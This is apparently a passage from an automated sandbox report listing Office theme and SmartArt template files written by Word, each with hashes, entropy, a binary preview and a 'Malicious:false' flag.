                                                                                                                                                        Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):608122
                                                                                                                                                        Entropy (8bit):7.729143855239127
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5783
                                                                                                                                                        Entropy (8bit):7.88616857639663
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4026
                                                                                                                                                        Entropy (8bit):7.809492693601857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4243
                                                                                                                                                        Entropy (8bit):7.824383764848892
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16806
                                                                                                                                                        Entropy (8bit):7.9519793977093505
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11380
                                                                                                                                                        Entropy (8bit):7.891971054886943
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6024
                                                                                                                                                        Entropy (8bit):7.886254023824049
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9191
                                                                                                                                                        Entropy (8bit):7.93263830735235
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4326
                                                                                                                                                        Entropy (8bit):7.821066198539098
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7370
                                                                                                                                                        Entropy (8bit):7.9204386289679745
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5596
                                                                                                                                                        Entropy (8bit):7.875182123405584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                        MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3683
                                                                                                                                                        Entropy (8bit):7.772039166640107
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                        Malicious:false
